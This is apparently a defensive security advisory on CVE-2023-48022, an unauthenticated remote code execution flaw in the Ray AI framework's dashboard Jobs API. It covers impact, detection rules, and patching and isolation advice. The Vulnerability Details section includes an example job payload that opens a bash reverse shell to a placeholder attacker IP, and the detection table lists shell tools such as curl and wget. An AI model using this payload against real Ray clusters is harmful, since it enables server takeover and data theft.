Critical RCE Flaw in Ray AI Framework Actively Exploited After PoC Release

Executive Summary

A critical remote code execution (RCE) vulnerability, tracked as CVE-2023-48022 with a CVSS score of 9.8, has been disclosed in the Ray open-source framework, a popular tool for scaling AI and Python applications. The vulnerability arises from a missing authentication control in the Ray Dashboard component, which is accessible by default. This oversight allows unauthenticated attackers to remotely submit jobs and execute arbitrary code with the permissions of the Ray instance.

The risk has been significantly amplified by the public release of a proof-of-concept (PoC) exploit, making it trivial for malicious actors to scan for and compromise vulnerable servers. Security scanning services like Shodan have identified over 1,700 internet-exposed Ray instances, putting valuable AI/ML infrastructure, sensitive training data, and computational resources at immediate risk. The framework's developer, Anyscale, has released a patch in version 2.7.0. All organizations using Ray versions 2.6.3 and earlier are strongly advised to upgrade immediately or apply the recommended mitigations to prevent a compromise.

Vulnerability Details

The core of CVE-2023-48022 is an authentication bypass in the Ray Dashboard's Jobs API. By default, Ray clusters do not enforce authentication, exposing the dashboard and its powerful API to anyone with network access. An attacker can exploit this by sending a specially crafted HTTP POST request to the /api/jobs/ endpoint on the Ray Dashboard's default port, 8265.

The malicious request contains a JSON payload that defines a new job. The key parameter is entrypoint, which specifies the command to be executed on the Ray cluster's head node. By setting this to a malicious command (e.g., a reverse shell), an attacker can achieve remote code execution.

An example exploitation payload looks like this:

{
  "entrypoint": "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'",
  "runtime_env": {}
}

Upon receiving this request, the Ray cluster's Job Supervisor component will dutifully execute the command specified in entrypoint, giving the attacker full control over the node. This requires no user interaction and no prior authentication, making it a highly critical and easily exploitable vulnerability.

Affected Systems

Product: Ray, an open-source unified framework for scaling AI and Python applications.
Affected Versions: All Ray versions up to and including 2.6.3.
Patched Versions: Ray 2.7.0 and later.

Any server or cluster running a vulnerable version of Ray with its dashboard port (8265/TCP) exposed to untrusted networks is at risk. This is particularly dangerous in cloud environments where misconfigured security groups can inadvertently expose the service to the public internet.

Exploitation Status

A proof-of-concept (PoC) exploit for CVE-2023-48022 was publicly released shortly after the vulnerability's disclosure. This has lowered the barrier to entry for attackers, and active scanning for vulnerable instances is expected. A simple Shodan query for "Ray" http.title:"Ray Dashboard" reveals over 1,700 publicly accessible Ray Dashboards, all of which are presumed vulnerable if running an unpatched version. Given the value of the underlying computational resources, these systems are prime targets for cryptojacking groups and other threat actors seeking to build botnets or steal proprietary data and AI models.

Impact Assessment

Successful exploitation of CVE-2023-48022 grants an attacker complete control over the Ray cluster, leading to severe business impacts:

Data and Model Theft: Attackers can exfiltrate sensitive training data, proprietary datasets, and valuable, compiled AI/ML models, resulting in significant intellectual property loss.
Resource Hijacking: The high-performance compute nodes in AI/ML clusters are attractive targets for cryptomining operations (T1496 - Resource Hijacking). This can lead to exorbitant cloud service bills and degradation of legitimate services.
Ransomware and Data Destruction: An attacker could encrypt all data and models on the cluster and demand a ransom for their release.
Pivot Point for Lateral Movement: Once the Ray cluster is compromised, it can serve as a powerful beachhead within the victim's network, allowing the attacker to move laterally to other corporate systems.

The exposure of AI/ML infrastructure represents a new frontier of risk. The intellectual property contained within these systems can be an organization's most valuable asset, making their compromise a potentially existential threat.

Cyber Observables for Detection

Security teams should proactively hunt for signs of vulnerability and exploitation using the following observables:

Type	Value	Description
URL Pattern	`/api/jobs/`	Look for POST requests to this endpoint in web server or reverse proxy logs. Legitimate use may exist, but traffic from untrusted sources is highly suspicious.
Network Port	`8265/TCP`	The default port for the Ray Dashboard. Any inbound traffic to this port from the internet should be investigated immediately.
Process Execution	Child processes of `dashboard.py`	Monitor for suspicious child processes (e.g., `sh`, `bash`, `curl`, `wget`) spawned by the Ray Dashboard process.
Log Source	`dashboard.log`, `dashboard_agent.log`	Review Ray's internal logs for job submissions with unusual `entrypoint` commands or from unexpected sources.

Detection & Response

Defenders should implement the following detection and response strategies:

Asset Discovery: Immediately scan internal and external networks for systems running the Ray Dashboard on port 8265. Use vulnerability scanners or tools like nmap and Shodan to identify all exposed instances.
Log Analysis & Monitoring (D3-NTA: Network Traffic Analysis):
- In your SIEM or web log aggregator, create detection rules for HTTP POST requests to the /api/jobs/ URI path.
- Alert on any connections to port 8265 from external IP addresses or internal segments that should not have access.
- Use Endpoint Detection and Response (EDR) to monitor for anomalous process creation from the main Ray service process. A rule could look for ray.dashboard.agent or dashboard.py spawning shell processes.
```
# Example SIEM Rule Logic
name: Possible Ray RCE Exploitation CVE-2023-48022
description: Detects POST requests to the vulnerable Ray Jobs API endpoint.
detection:
  selection:
    http_method: 'POST'
    url_path: '/api/jobs/'
    destination_port: 8265
  filter:
    - source_ip in [trusted_ip_list]
  condition: selection and not filter
```
Threat Hunting:
- Proactively search for systems with port 8265 open to the internet.
- Hunt for suspicious commands in entrypoint fields within Ray's job submission logs.
- Look for evidence of resource hijacking, such as sustained high CPU usage on cluster nodes that does not correlate with legitimate workloads.
Incident Response: If a compromise is suspected, immediately isolate the affected Ray cluster from the network to prevent lateral movement. Preserve logs and system images for forensic analysis. Terminate any suspicious running jobs and hunt for persistence mechanisms.

Mitigation

Organizations must take immediate action to mitigate this vulnerability. Remediation should be prioritized as follows:

Patch (D3-SU: Software Update): The most effective solution is to upgrade all Ray instances to version 2.7.0 or newer. This version addresses the vulnerability by introducing authentication and better default security configurations.
Network Isolation (D3-NI: Network Isolation): If patching is not immediately possible, restrict access to the Ray Dashboard port (8265). Use a firewall, security group, or reverse proxy to ensure that only trusted IP addresses (such as from an internal management network or VPN) can connect to the dashboard.

CRITICAL: Under no circumstances should the Ray Dashboard be exposed to the public internet.
Configuration Hardening (D3-ACH: Application Configuration Hardening): When starting a Ray cluster, bind the head node to localhost to prevent it from listening on external network interfaces. This can be done using the --host=localhost flag. This ensures the dashboard is only accessible from the machine it is running on.
Audit and Verification: After applying mitigations, use a port scanner or external service to verify that port 8265 is no longer accessible from untrusted networks. Regularly audit cloud security group configurations to prevent accidental exposure in the future.

To detect active exploitation attempts against Ray clusters, implement Network Traffic Analysis focused on the Ray Dashboard. Configure network monitoring tools, web application firewalls (WAF), or SIEM solutions to specifically inspect traffic destined for port 8265. Create a high-priority alert that triggers on any HTTP POST request to the /api/jobs/ URL path originating from an untrusted or external IP address. While legitimate job submissions use this endpoint, they should only come from known, internal systems. Correlate network data with threat intelligence feeds to block known malicious IPs. Furthermore, establish a baseline for normal traffic patterns to and from your Ray clusters. Monitor for anomalous data flows, such as large egress transfers to unusual destinations, which could indicate data exfiltration following a compromise. This detection strategy provides an opportunity to identify and respond to an attack in its early stages, even before a full compromise is achieved.

Critical RCE Flaw in Ray AI Framework Actively Exploited After PoC Release

Critical RCE Flaw in Ray AI Framework Actively Exploited After PoC Release

Public Exploit for Critical Ray RCE Vulnerability (CVE-2023-48022) Threatens Thousands of AI/ML Servers

Related Entities

Organizations

Products & Tech

Other

CVE Identifiers

MITRE ATT&CK Techniques

Exploit Public-Facing Application

Python

Exploitation for Privilege Escalation

Resource Hijacking

Full Report

Executive Summary

Vulnerability Details

Affected Systems

Exploitation Status

Impact Assessment

Cyber Observables for Detection

Detection & Response

Mitigation

Timeline of Events

MITRE ATT&CK Mitigations

Update Software

Limit Access to Resource Over Network

Software Configuration

Audit

D3FEND Defensive Countermeasures

Software Update

Network Isolation

Network Traffic Analysis

Sources & References

Article Author

Jason Gomes

Tags

📢 Share This Article